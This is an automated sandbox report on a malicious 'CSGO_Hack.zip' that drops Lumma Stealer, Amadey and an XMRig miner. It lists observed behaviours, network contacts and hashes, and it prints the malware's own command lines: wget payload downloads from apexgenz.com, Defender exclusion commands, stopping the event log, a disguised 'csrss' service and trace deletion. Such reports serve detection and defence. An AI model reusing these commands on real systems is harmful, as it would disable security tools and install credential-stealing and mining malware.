Analysis Overview
SHA256
37ffba131c763e2630433b2865a8149508af32f387fb5808cfaf539815bb5077
Threat Level: Known bad
The file CSGO_Hack.zip was found to be: Known bad.
Malicious Activity Summary
Lumma Stealer
xmrig
Amadey
XMRig Miner payload
Stops running service(s)
Drops file in Drivers directory
Creates new service(s)
Uses the VBS compiler for execution
Checks BIOS information in registry
Legitimate hosting services abused for malware hosting/C2
Checks computer location settings
Drops file in System32 directory
Suspicious use of SetThreadContext
Modifies system executable filetype association
Executes dropped EXE
Launches sc.exe
Loads dropped DLL
Enumerates physical storage devices
Unsigned PE
Program crash
Suspicious behavior: GetForegroundWindowSpam
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Modifies data under HKEY_USERS
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-28 18:16
Signatures
Unsigned PE
Analysis: behavioral15
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:26
Platform
win7-20240221-en
Max time kernel
154s
Max time network
163s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\kGCFZO6TPVYy.ps1
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
121s
Max time network
139s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.dll,#1
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
158s
Command Line
Signatures
Amadey
Lumma Stealer
xmrig
XMRig Miner payload
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\system32\conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\conhost.exe | N/A |
Uses the VBS compiler for execution
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 636 set thread context of 660 | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | C:\Users\Admin\AppData\Roaming\services\plugin0228 |
| PID 1076 set thread context of 2632 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 1076 set thread context of 4700 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 3160 set thread context of 3780 | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0228 | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\services\plugin0228 |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (certificate blob not included in this export; set four times) | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\conhost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0228
C:\Users\Admin\AppData\Roaming\services\plugin0228
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0228
"C:\Users\Admin\AppData\Roaming\services\plugin0228"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 660 -ip 660
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 660 -s 592
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "csrss"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "csrss" binpath= "C:\ProgramData\SystemFiles\csrss.exe" start= "auto"
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\services\2plugin2901"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "csrss"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\SystemFiles\csrss.exe
C:\ProgramData\SystemFiles\csrss.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\conhost.exe
conhost.exe
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\3plugin0228
C:\Users\Admin\AppData\Roaming\services\3plugin0228
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | solvadordali.com | udp |
| US | 8.8.8.8:53 | 199.29.14.185.in-addr.arpa | udp |
| US | 20.231.121.79:80 | N/A | tcp |
| NL | 185.14.29.199:80 | solvadordali.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| NL | 194.87.31.18:3333 | N/A | tcp |
| US | 8.8.8.8:53 | 18.31.87.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | favourlegislatureduei.shop | udp |
| US | 104.21.60.195:443 | favourlegislatureduei.shop | tcp |
| US | 8.8.8.8:53 | technologyenterdo.shop | udp |
| US | 104.21.80.118:443 | technologyenterdo.shop | tcp |
| US | 8.8.8.8:53 | 195.60.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lighterepisodeheighte.fun | udp |
| US | 8.8.8.8:53 | problemregardybuiwo.fun | udp |
| US | 8.8.8.8:53 | detectordiscusser.shop | udp |
| US | 104.21.60.92:443 | detectordiscusser.shop | tcp |
| US | 8.8.8.8:53 | edurestunningcrackyow.fun | udp |
| US | 8.8.8.8:53 | 118.80.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.60.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pooreveningfuseor.pw | udp |
| US | 8.8.8.8:53 | turkeyunlikelyofw.shop | udp |
| US | 172.67.202.191:443 | turkeyunlikelyofw.shop | tcp |
| US | 8.8.8.8:53 | associationokeo.shop | udp |
| US | 172.67.147.18:443 | associationokeo.shop | tcp |
| US | 8.8.8.8:53 | 191.202.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.147.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
| MD5 | e5c00b0bc45281666afd14eef04252b2 |
| SHA1 | 3b6eecf8250e88169976a5f866d15c60ee66b758 |
| SHA256 | 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903 |
| SHA512 | 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll
| MD5 | 7de0541eb96ba31067b4c58d9399693b |
| SHA1 | a105216391bd53fa0c8f6aa23953030d0c0f9244 |
| SHA256 | 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e |
| SHA512 | e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest
| MD5 | f0fc065f7fd974b42093594a58a4baef |
| SHA1 | dbf28dd15d4aa338014c9e508a880e893c548d00 |
| SHA256 | d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693 |
| SHA512 | 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_om4kuejz.jtq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
| MD5 | fea10d11d84919cb9a0a0752d61c0a66 |
| SHA1 | aea3c65e2b62851b2dd112597f28379b49c58a0a |
| SHA256 | 2786febdd57874118eaf5e257382cf4467d43f9ca189ac48ff6d45494f1cbab7 |
| SHA512 | e382f79ec1f1c370cd0053cccc7a0db8f3dc28b22f9dacd5f425c60adfb21e4a6eed3e119a7f9bbf135839e22d46511ca793cf8b5118d0e6256ebbbe749fc508 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
| MD5 | f58866e5a48d89c883f3932c279004db |
| SHA1 | e72182e9ee4738577b01359f5acbfbbe8daa2b7f |
| SHA256 | d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12 |
